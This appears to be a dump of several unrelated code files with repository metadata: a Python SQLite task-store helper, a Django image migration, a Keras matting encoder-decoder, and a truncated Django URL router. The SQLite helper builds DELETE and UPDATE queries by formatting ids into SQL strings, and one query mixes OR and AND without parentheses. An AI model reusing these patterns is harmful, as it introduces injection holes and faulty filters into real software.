zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sqlite3
import logging
logger = logging.getLogger("xtc")
class sqlite_handle(object):
def __init__(self):
self.dbname = "Xsense.db"
self.conn = None
def db_init(self): # 初始化db task_info、apps、scripts、run_tasks
self.db_table_all()
conn = sqlite3.connect(self.dbname)
try:
for cre in self.create_dic:
conn.execute(cre)
# logger.info(cre)
except Exception as e:
logger.info("Create table failed: {}".format(e))
return False
finally:
conn.close()
def insert_task(self,taskdict): # 插入任务信息 for
conn = sqlite3.connect(self.dbname)
for task in taskdict:
conn.execute(
'INSERT INTO task_Info VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)',task
)
conn.commit()
conn.close()
def insert_script_one(self,scriptOne): # 插入脚本信息
conn = sqlite3.connect(self.dbname)
conn.execute(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',scriptOne
)
conn.commit()
conn.close()
def insert_task_many(self,script_data): # 插入任务信息 多项
conn = sqlite3.connect(self.dbname)
conn.executemany(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',script_data
)
conn.commit()
conn.close()
def db_table_all(self):
crt_task_info = '''CREATE TABLE IF NOT EXISTS task_info (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
crt_scripts = '''CREATE TABLE IF NOT EXISTS scripts (
scriptId INT, scriptName TEXT, scriptType int,scriptUrl TEXT,
uploadDate int, scriptMaxRunTime int, scriptVersion int,
scriptCacheUrl TEXT
);'''
crt_apps = '''CREATE TABLE IF NOT EXISTS apps (
scriptId INT, appCheck int, appPackageName TEXT, appUrl TEXT, appMd5 TEXT,
appVersion TEXT, appVersionCode TEXT, appLastUpdateTime TEXT, appCacheUrl TEXT
);'''
run_tasks = '''CREATE TABLE IF NOT EXISTS run_tasks (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
create_dic = []
create_dic.append(crt_task_info)
create_dic.append(crt_scripts)
create_dic.append(crt_apps)
create_dic.append(run_tasks) # 保存需要运行的任务 有必要么
self.create_dic = create_dic
def query_runtask(self):
conn = sqlite3.connect(self.dbname)
taskrows = [] #元素为tuple,(205937, 'pyclient-test', 1, 107864, 'http://202.105.193....69910.zip', 20191006000000, 20201231235959, '000000', '235959', 2, 1, 1, 1)
# 获取未完成的按次任务 不含重复项 新增+启动, exeType=2按次执行 exeType=1按时执行
# optType 1`=新增任务;`2`=暂停任务;`3`=启动任务;`4`=删除任务
for row in conn.execute('SELECT DISTINCT * FROM task_info WHERE optType=3 OR optType=1 AND exeType=2 AND startIterationNumber<=iterationNum'):
taskrows.append(row)
conn.close()
return taskrows
def dele_table(self):
pass
def query(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
# cursor = self.conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
data = cursor.fetchall()
cursor.close()
return data
def update(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
# cursor = self.conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
conn.commit()
cursor.close()
def _update(self, sql, value=None, querymany=True):
ret = True
try:
if querymany:
self.update(sql, value)
else:
self.update(sql)
#except SqliteException:
except Exception as e:
logger.info("error('执行sqlite: {} 时出错:{}')".format(sql, e))
ret = False
return ret
def del_task_byid(self, taskid):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
sql = 'DELETE FROM task_info WHERE taskid={}'.format(taskid)
cursor.execute(sql)
logger.info("刪除taskid={} cursor.rowcount={}".format(taskid, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_status(self, taskid, status):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET optType={} WHERE taskid={}".format(status, taskid))
logger.info("更新taskid={},设置optType={},cursor.rowcount={}".format(taskid, status, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_count(self, taskid, run_count):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET startIterationNumber={} WHERE taskid={}".format(run_count, taskid))
logger.info("更新taskid={},startIterationNumber={},cursor.rowcount={}".format(taskid, run_count, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def updata_table(self):
pass
if __name__ == "__main__":
handle = sqlite_handle()
if not os.path.isfile(handle.dbname):
handle.db_init()
#taskrows = handle.query_runtask()
#print("taskrows=" + str(taskrows))
#handle.del_task_byid("1235")
handle.update_task_run_count("206266", 60)
#handle.update_task_run_status("206266", "5")
# 更新/删除 单条任务、更新 脚本信息
# 下载前查询数据库,如果脚本id已经存在,且更新时间一致 则不下载,否则下载-->入库
# 任务运行,先检查是否有新任务,如果有新任务,则入库,
# 没有新任务,则查询数据库,任务id运行信息是否达到rm条件(过期、完成等)
# 如果运行 轮次达到 总轮次 则del
# 如果 结束时间超过当前时间 则del
# 此处需要增加 id 排序 后再运行
# 运行完成后,更新 id对应的轮次信息
# 今天搞定 脚本运行和结果文件 ,然后做db update 和 remove
| 36.318436
| 167
| 0.591601
|
import os
import sqlite3
import logging
logger = logging.getLogger("xtc")
class sqlite_handle(object):
def __init__(self):
self.dbname = "Xsense.db"
self.conn = None
def db_init(self):
self.db_table_all()
conn = sqlite3.connect(self.dbname)
try:
for cre in self.create_dic:
conn.execute(cre)
except Exception as e:
logger.info("Create table failed: {}".format(e))
return False
finally:
conn.close()
def insert_task(self,taskdict):
conn = sqlite3.connect(self.dbname)
for task in taskdict:
conn.execute(
'INSERT INTO task_Info VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)',task
)
conn.commit()
conn.close()
def insert_script_one(self,scriptOne):
conn = sqlite3.connect(self.dbname)
conn.execute(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',scriptOne
)
conn.commit()
conn.close()
def insert_task_many(self,script_data):
conn = sqlite3.connect(self.dbname)
conn.executemany(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',script_data
)
conn.commit()
conn.close()
def db_table_all(self):
crt_task_info = '''CREATE TABLE IF NOT EXISTS task_info (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
crt_scripts = '''CREATE TABLE IF NOT EXISTS scripts (
scriptId INT, scriptName TEXT, scriptType int,scriptUrl TEXT,
uploadDate int, scriptMaxRunTime int, scriptVersion int,
scriptCacheUrl TEXT
);'''
crt_apps = '''CREATE TABLE IF NOT EXISTS apps (
scriptId INT, appCheck int, appPackageName TEXT, appUrl TEXT, appMd5 TEXT,
appVersion TEXT, appVersionCode TEXT, appLastUpdateTime TEXT, appCacheUrl TEXT
);'''
run_tasks = '''CREATE TABLE IF NOT EXISTS run_tasks (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
create_dic = []
create_dic.append(crt_task_info)
create_dic.append(crt_scripts)
create_dic.append(crt_apps)
create_dic.append(run_tasks)
self.create_dic = create_dic
def query_runtask(self):
conn = sqlite3.connect(self.dbname)
taskrows = []
for row in conn.execute('SELECT DISTINCT * FROM task_info WHERE optType=3 OR optType=1 AND exeType=2 AND startIterationNumber<=iterationNum'):
taskrows.append(row)
conn.close()
return taskrows
def dele_table(self):
pass
def query(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
data = cursor.fetchall()
cursor.close()
return data
def update(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
conn.commit()
cursor.close()
def _update(self, sql, value=None, querymany=True):
ret = True
try:
if querymany:
self.update(sql, value)
else:
self.update(sql)
except Exception as e:
logger.info("error('执行sqlite: {} 时出错:{}')".format(sql, e))
ret = False
return ret
def del_task_byid(self, taskid):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
sql = 'DELETE FROM task_info WHERE taskid={}'.format(taskid)
cursor.execute(sql)
logger.info("刪除taskid={} cursor.rowcount={}".format(taskid, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_status(self, taskid, status):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET optType={} WHERE taskid={}".format(status, taskid))
logger.info("更新taskid={},设置optType={},cursor.rowcount={}".format(taskid, status, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_count(self, taskid, run_count):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET startIterationNumber={} WHERE taskid={}".format(run_count, taskid))
logger.info("更新taskid={},startIterationNumber={},cursor.rowcount={}".format(taskid, run_count, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def updata_table(self):
pass
if __name__ == "__main__":
handle = sqlite_handle()
if not os.path.isfile(handle.dbname):
handle.db_init()
handle.update_task_run_count("206266", 60)
| true
| true
|
790dc1204f7d88fa8e7a6bfc76e42000069a6612
| 1,009
|
py
|
Python
|
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | null | null | null |
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | 4
|
2020-06-06T01:10:11.000Z
|
2021-09-08T02:04:23.000Z
|
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.6 on 2020-05-24 13:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('grid', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img_name', models.CharField(max_length=30)),
('img_description', models.TextField()),
('photo', models.ImageField(default='', upload_to='images/')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Category')),
('editor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Editor')),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Location')),
],
),
]
| 37.37037
| 114
| 0.60555
|
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('grid', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img_name', models.CharField(max_length=30)),
('img_description', models.TextField()),
('photo', models.ImageField(default='', upload_to='images/')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Category')),
('editor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Editor')),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Location')),
],
),
]
| true
| true
|
790dc142b9a7987a252d5c15f3f5739223b31b94
| 9,171
|
py
|
Python
|
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
# Conv-MaxPool SPP 24M
def build_encoder_decoder():
# Encoder
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
# Image average pooling
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
# Concat
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
# Decoder
#
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
| 44.736585
| 141
| 0.637771
|
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
def build_encoder_decoder():
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
| true
| true
|
790dc17972f0343866fcf1c4348d39c89d4aaf8e
| 358
|
py
|
Python
|
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | 1
|
2020-07-22T16:29:21.000Z
|
2020-07-22T16:29:21.000Z
|
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | null | null | null |
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from recipe import views
router = DefaultRouter()
router.register('tags', views.TagViewSet)
router.register('ingredients', views.IngredientViewSet)
router.register('recipe', views.RecipeViewSet)
app_name = 'recipe'
urlpatterns = [
path('', include(router.urls))
]
| 23.866667
| 55
| 0.77933
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from recipe import views
router = DefaultRouter()
router.register('tags', views.TagViewSet)
router.register('ingredients', views.IngredientViewSet)
